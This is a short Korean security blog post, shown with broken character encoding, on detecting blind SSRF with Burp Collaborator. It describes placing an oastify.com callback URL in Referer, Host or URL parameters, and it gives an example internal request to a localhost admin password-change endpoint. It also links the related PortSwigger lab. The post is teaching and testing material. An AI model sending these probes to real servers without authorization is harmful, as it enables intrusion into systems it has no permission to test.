๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์ทจ์•ฝ์  ๋ถ„์„

์ทจ์•ฝ์  ๋ถ„์„ - Blind SSRF with out-of-band detection(Burp Collaborator)

Janger 2025. 1. 10. 10:41
728x90

 

 

Burp์˜ Collaborator์„ ์ด์šฉํ•˜์—ฌ, ํƒ€๊ฒŸ ์„œ๋ฒ„์˜ SSRF์— ์ทจ์•ฝํ•œ์ง€ ์•Œ์•„๋‚ผ ์ˆ˜ ์žˆ์Œ

 

์‚ฌ์šฉ ์˜ˆ์‹œ)

target.com์— request์‹œ Refer, hosts, URL์„ ์ž…๋ ฅ ๋ฐ›๋Š” parameter ๋“ฑ์—๋‹ค Collaborator์—์„œ ๋ณต์‚ฌํ•œ URL({random_strings}.oastify.com)์„ ๋„ฃ๊ณ  ์š”์ฒญ, ์ด ๋•Œ Collaborator ํƒญ์— ๋ฐ˜์‘์ด ์˜ฌ ๊ฒฝ์šฐ ํ•ด๋‹น ์›น ์„œ๋ฒ„์— SSRF ์ทจ์•ฝ์ ์ด ์žˆ์Œ์„ ์ธ์ง€

 

(ํƒ€๊ฒŸ ์„œ๋ฒ„๊ฐ€ ์ž„์˜์˜ URL์—๋‹ค ์š”์ฒญ์„ ํ•˜๊ธฐ ๋•Œ๋ฌธ์—, ๋งŒ์•ฝ http://localhost/admin?changePassword=1234 ๊ฐ™์€ ์š”์ฒญ์ด ๊ฐ€๋Šฅ์ผ€ํ•ด ์ •์ƒ์ ์ธ ๋™์ž‘์ด ์ˆ˜ํ–‰๋œ๋‹ค๋ฉด ์ด๋Š” SSRF์— ์ทจ์•ฝ)

 

 

https://www.youtube.com/watch?v=-iNidz-O2FY

 

 

https://portswigger.net/blog/introducing-burp-collaborator

 

Introducing Burp Collaborator

Today's release of Burp Suite introduces Burp Collaborator. This new feature has the potential to revolutionize web security testing. Over time, Burp Collaborator will enable Burp to detect issues lik

portswigger.net

 

Lab

 

https://portswigger.net/web-security/ssrf/blind/lab-out-of-band-detection

 

Lab: Blind SSRF with out-of-band detection | Web Security Academy

This site uses analytics software which fetches the URL specified in the Referer header when a product page is loaded. To solve the lab, use this ...

portswigger.net

 

 

728x90